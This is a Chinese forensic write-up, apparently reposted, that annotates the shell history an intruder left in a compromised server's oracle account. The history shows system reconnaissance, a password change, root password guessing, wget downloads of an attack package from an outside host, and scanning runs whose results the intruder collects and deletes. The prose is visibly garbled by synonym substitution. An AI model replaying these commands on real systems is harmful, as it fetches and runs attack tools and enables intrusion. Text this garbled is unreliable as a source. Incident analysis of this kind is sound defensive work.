下面看看黑客用oracle账户都做了什么。起首复制一份oracle的呼吁汗青,防备后续操纵丢失该记录。
- cp /home/oracle/.bash_history hacker_history
然后查察说明这个文件。 我在后头备注了黑客的设法。
- vi .bash_profile
- vi .bash_profile (查察.bash_profile,看变量配置,把/home/oracle/bin增进到PATH)
- ll
- cd /
- vi .bash_profile
- vi .bash_profile (执行,配置情形变量)
- w
- ps x (查察体系运行历程)
- free -m (查察内存巨细)
- uname -a (查察体系版本)
- cat /etc/issue (查察体系刊行版)
- cat /etc/hosts (查察是否有网内呆板)
- cat /proc/cpuinfo (查察CPU型号)
- cat .bash_history (查察oracle账户汗青操纵)
- w (查察体系负载)
- ls -a (查察/home/oracle/下的潜匿文件)
- passwd (修改掉oracle账户的暗码)
- exit
- ls
- oracle
- sqlplus (运行sqlplus)
- su (试图切换到root账户)
- app1123456 (揣摩root暗码)
- ls
- su -
- w
- free -m
- php -v (查察php版本)
- exit
- w
- free -m
- php -v
- ps aux
- ls -a
- exit
- w
- free -m
- php -v
- cat bash_his (查察汗青呼吁)
- cat bash_history
- cat .bash_history
- wget scriptcoders.ucoz.com/piata.tgz (下载肉鸡进攻软件包)
- tar zxvf piata.tgz (解压软件包)
- rm -rf piata.tgz (删除软件包)
- cd piata/ (切换到进攻软件目次)
- ls -a
- chmod +x *
- ./a 210.212 (运行进攻软件)
- screen (试图运行screen呼吁,发明没有后下载它)
- ls -a
- wget scriptcoders.ucoz.com/screen.tgz
- tar zxvf screen.tgz (解压)
- ./screen
- exit
- w
- ps x
- cd piata/ (切换到进攻软件目次)
- ls -a
- cat vuln.txt (查察进攻功效)
- ls -a
- mv vuln.txt 1.txt (生涯进攻功效)
- ./screen -r
- nano 1.txt (查察功效文件)
- w
- ps x
- exit
- cd piata
- ps x
- ls -a
- nano 2.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat
- mv vuln.txt 2.txt (生涯功效)
- nano 2.txt
- w
- ps x
- cd piata/
- ls- a
- cat vuln.txt
- rm -rf vuln.txt
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- mv vuln.txt 3.txt (生涯功效)
- nano 3.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- rm -rf 1.txt
- rm -rf 2.txt
- rm -rf 2.txt.save
- rm -rf 3.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- nano vuln.txt
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- ls -a
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- ps x
- ls -a
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- rm -rf vuln.txt
- ./screen -r
- exit
3.3 进攻器材一览 (编辑:湖南网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|